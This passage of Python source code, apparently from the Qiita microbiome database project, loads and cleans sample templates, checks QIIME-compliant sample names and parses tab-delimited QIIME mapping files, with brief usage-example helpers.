# let pandas infer the dtypes of these columns, if the inference is
# not correct, then we have to raise an error
columns_to_dtype = [(['latitude', 'longitude'], (np.int, np.float),
'integer or decimal'),
(['has_physical_specimen', 'has_extracted_data'],
np.bool_, 'boolean')]
for columns, c_dtype, english_desc in columns_to_dtype:
for n in columns:
if n in template.columns and not all([isinstance(val, c_dtype)
for val in template[n]]):
raise QiitaDBColumnError("The '%s' column includes values "
"that cannot be cast into a %s "
"value " % (n, english_desc))
initial_columns = set(template.columns)
if index not in template.columns:
raise QiitaDBColumnError("The '%s' column is missing from "
"your template, this file cannot be parsed."
% index)
# remove rows that have no sample identifier but that may have other data
# in the rest of the columns
template.dropna(subset=[index], how='all', inplace=True)
# set the sample name as the index
template.set_index(index, inplace=True)
# it is not uncommon to find templates that have empty columns
template.dropna(how='all', axis=1, inplace=True)
initial_columns.remove(index)
dropped_cols = initial_columns - set(template.columns)
if dropped_cols:
warnings.warn('The following column(s) were removed from the template '
'because all their values are empty: '
'%s' % ', '.join(dropped_cols), QiitaDBWarning)
# Pandas represents data with np.nan rather than Nones, change it to None
# because psycopg2 knows that a None is a Null in SQL, while it doesn't
# know what to do with NaN
template = template.where((pd.notnull(template)), None)
return template
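# A hedged usage sketch for load_template_to_dataframe, assuming a
# tab-separated sample template held in memory; a filename works the same way.
# The column values below are illustrative only.
def _example_load_template():
    text = ('sample_name\tphysical_location\tlatitude\tlongitude\n'
            '1.A\tfreezer_1\t10.5\t-70.2\n'
            '1.B\tfreezer_2\t11.0\t-71.0\n')
    # Returns a DataFrame indexed by sample_name, with latitude/longitude
    # parsed as floats and fully-empty columns dropped.
    return load_template_to_dataframe(StringIO(text))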
def get_invalid_sample_names(sample_names):
"""Get a list of sample names that are not QIIME compliant
Parameters
----------
sample_names : iterable
Iterable containing the sample names to check.
Returns
-------
list
List of str objects where each object is an invalid sample name.
References
----------
.. [1] QIIME File Types documentaiton:
http://qiime.org/documentation/file_formats.html#mapping-file-overview.
"""
# from the QIIME mapping file documentation
valid = set(letters+digits+'.')
inv = []
for s in sample_names:
if set(s) - valid:
inv.append(s)
return inv
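# A small sketch of get_invalid_sample_names: only ASCII letters, digits and
# '.' are QIIME-compliant, so names containing underscores or spaces are
# reported back as invalid.
def _example_get_invalid_sample_names():
    names = ['sample.1', 'sample_2', 'sample 3']
    # Returns ['sample_2', 'sample 3']
    return get_invalid_sample_names(names)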
def looks_like_qiime_mapping_file(fp):
"""Checks if the file looks like a QIIME mapping file
Parameters
----------
fp : str or file-like object
filepath to check if it looks like a QIIME mapping file
Returns
-------
bool
True if fp looks like a QIIME mapping file, false otherwise.
Notes
-----
This is not doing a validation of the QIIME mapping file. It simply checks
the first line in the file and it returns true if the line starts with
'#SampleID', since a sample/prep template will start with 'sample_name' or
some other different column.
"""
first_line = None
with open_file(fp, mode='U') as f:
first_line = f.readline()
if not first_line:
return False
first_col = first_line.split()[0]
return first_col == '#SampleID'
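# A quick sketch of looks_like_qiime_mapping_file using in-memory files; only
# the first column of the first line is inspected, so this stays cheap even
# for large templates.
def _example_looks_like_qiime_mapping_file():
    qiime_fp = StringIO('#SampleID\tBarcodeSequence\n1.A\tAAAA\n')
    qiita_fp = StringIO('sample_name\tdescription\n1.A\tcontrol\n')
    # Returns (True, False)
    return (looks_like_qiime_mapping_file(qiime_fp),
            looks_like_qiime_mapping_file(qiita_fp))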
def _parse_mapping_file(lines, strip_quotes=True, suppress_stripping=False):
"""Parser for map file that relates samples to metadata.
Format: header line with fields
optionally other comment lines starting with #
tab-delimited fields
Parameters
----------
lines : iterable of str
The contents of the QIIME mapping file
strip_quotes : bool, optional
Defaults to true. If true, quotes are removed from the data
suppress_stripping : bool, optional
Defaults to false. If true, spaces are not stripped
Returns
-------
list of lists, list of str, list of str
The data in the mapping file, the headers and the comments
Raises
------
QiitaDBError
If there is any error parsing the mapping file
Notes
-----
This code has been ported from QIIME.
"""
if strip_quotes:
if suppress_stripping:
# remove quotes but not spaces
def strip_f(x):
return x.replace('"', '')
else:
# remove quotes and spaces
def strip_f(x):
return x.replace('"', '').strip()
else:
if suppress_stripping:
# don't remove quotes or spaces
def strip_f(x):
return x
else:
# remove spaces but not quotes
def strip_f(x):
return x.strip()
# Create lists to store the results
mapping_data = []
header = []
comments = []
# Begin iterating over lines
for line in lines:
line = strip_f(line)
if not line or (suppress_stripping and not line.strip()):
# skip blank lines when not stripping lines
continue
if line.startswith('#'):
line = line[1:]
if not header:
header = line.strip().split('\t')
else:
comments.append(line)
else:
# Will add empty string to empty fields
            tmp_line = list(map(strip_f, line.split('\t')))
if len(tmp_line) < len(header):
tmp_line.extend([''] * (len(header) - len(tmp_line)))
mapping_data.append(tmp_line)
if not header:
raise QiitaDBError("No header line was found in mapping file.")
if not mapping_data:
raise QiitaDBError("No data found in mapping file.")
return mapping_data, header, comments
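# A brief sketch of _parse_mapping_file on a QIIME-style mapping file given as
# a list of lines: the leading '#' line becomes the header, later '#' lines
# become comments, and short data rows are padded with empty strings.
def _example_parse_mapping_file():
    lines = ['#SampleID\tBarcodeSequence\tDescription\n',
             '#this line is a comment\n',
             '1.A\tAAAA\tcontrol\n']
    # Returns ([['1.A', 'AAAA', 'control']],
    #          ['SampleID', 'BarcodeSequence', 'Description'],
    #          ['this line is a comment'])
    return _parse_mapping_file(lines)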
|